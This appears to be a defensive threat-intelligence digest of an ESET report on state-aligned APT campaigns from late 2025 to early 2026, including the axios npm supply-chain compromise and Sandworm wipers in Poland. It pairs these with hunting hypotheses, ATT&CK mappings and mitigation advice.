ESET APT Activity Report Q4 2025–Q1 2026
ESET's Q4 2025–Q1 2026 APT Activity Report highlights global espionage and destructive campaigns by state-aligned actors. Notable incidents include a major supply chain compromise of the 'axios' npm library by Lazarus, destructive wiper attacks on Polish critical infrastructure by Sandworm, and the deployment of new edge-device implants like PhiliKit against Ivanti VPNs by China-aligned groups.
Authors: ESET Research
Source:
ESET
- npm_packageaxiosCompromised by the Lazarus group during Operation DangerousPassword to inject trojanized code into downstream applications.
Detection / HunterGoogle
What Happened
State-sponsored hacking groups from China, Russia, North Korea, and Iran conducted widespread cyber espionage and destructive attacks between late 2025 and early 2026. Targets included government agencies, defense contractors, and critical infrastructure worldwide. Notably, hackers compromised a highly popular software library called 'axios', potentially affecting millions of applications, and launched destructive attacks against a Polish energy company. Organizations should ensure their software supply chains are secure, patch internet-facing appliances like VPNs, and monitor for unusual network activity.
Key Takeaways
- North Korea's Lazarus group compromised the widely used 'axios' npm library (100M+ weekly downloads) via stolen maintainer credentials to inject trojanized code.
- Russia's Sandworm deployed wipers against a Polish energy company, marking a rare destructive attack against critical infrastructure in a NATO member state.
- China-aligned groups deployed a new implant, PhiliKit, targeting Ivanti VPN appliances, and focused heavily on maritime, energy, and strategic technology sectors.
- Iran-aligned APT activity temporarily declined due to domestic internet restrictions, but proxy groups increased attacks against Israel and the US.
- Andariel reemerged in South Korea, deploying TigerRAT and Rook ransomware against an engineering firm involved in nuclear and liquid hydrogen technologies.
Affected Systems
- Ivanti VPN appliances
- SmartOffice CRM servers
- npm registry (axios library)
- Android devices
- Windows systems
Attack Chain
Threat actors utilized a variety of initial access vectors, including exploiting internet-facing appliances (Ivanti VPNs, SmartOffice CRM) and social engineering (Operation DreamJob). In a notable supply chain attack, Lazarus compromised developer credentials to inject trojanized code into the axios npm library. Post-compromise activities involved deploying custom implants (PhiliKit, Covenant, BeardShell) for espionage, or executing wipers and ransomware (Rook, bootkits) for destructive impact and financial gain.
Detection Availability
- YARA Rules: No
- Sigma Rules: No
- Snort/Suricata Rules: No
- KQL Queries: No
- Splunk SPL Queries: No
- EQL Queries: No
- Other Detection Logic: No
No specific detection rules or queries are provided in the article.
Detection Engineering Assessment
EDR Visibility: High — EDR solutions are highly effective at detecting post-exploitation implants, ransomware execution (Rook), and bootkit/wiper activity on endpoints. Network Visibility: Medium — Network visibility can identify anomalous traffic from compromised edge devices (VPNs, CRM servers) and C2 communication from known implants. Detection Difficulty: Moderate — While destructive payloads and ransomware are noisy and easier to detect, sophisticated supply chain compromises and custom edge-device implants require advanced behavioral monitoring.
Required Log Sources
- EDR telemetry
- VPN access logs
- Web server access logs
- Authentication logs
Hunting Hypotheses
| Hypothesis | Telemetry | ATT&CK Stage | FP Risk |
|---|---|---|---|
| Consider hunting for anomalous child processes spawned by VPN or CRM web server processes, which may indicate exploitation of edge appliances. | Process creation events (Event ID 4688 or Sysmon Event ID 1) | Initial Access / Execution | Low |
| If you have visibility into developer environments, consider hunting for unexpected modifications to build scripts or unauthorized package publishing activities. | Application logs / CI/CD pipeline logs | Execution / Persistence | Medium |
Control Gaps
- Lack of MFA on developer accounts
- Unpatched edge appliances
Key Behavioral Indicators
- Anomalous process execution from web or VPN appliance directories
- Unexpected disk or MBR modification attempts
False Positive Assessment
- Low
Recommendations
Immediate Mitigation
- Verify against your organization's incident response runbook and team escalation paths before acting.
- Audit your software dependencies for any compromised versions of the 'axios' npm library and ensure you are using a known safe version.
- Review authentication and access logs for internet-facing VPN and CRM appliances for signs of unauthorized access.
Infrastructure Hardening
- Ensure all internet-facing appliances, particularly Ivanti VPNs and SmartOffice CRM servers, are updated to the latest firmware.
- Enforce multi-factor authentication (MFA) for all developer accounts and access to critical code repositories.
User Protection
- If your EDR supports it, ensure behavioral protections against bootkit modifications and ransomware execution are enabled.
- Consider deploying mobile device management (MDM) solutions to prevent the installation of unverified Android applications.
Security Awareness
- Educate developers and staff on the risks of sophisticated social engineering schemes, such as Operation DreamJob.
- Train users to recognize browser-in-the-browser phishing techniques.
MITRE ATT&CK Mapping
- T1195.002 - Supply Chain Compromise: Compromise Software Supply Chain
- T1190 - Exploit Public-Facing Application
- T1078 - Valid Accounts
- T1561.002 - Disk Wipe: Disk Structure Wipe
- T1486 - Data Encrypted for Impact
- T1566.002 - Phishing: Spearphishing Link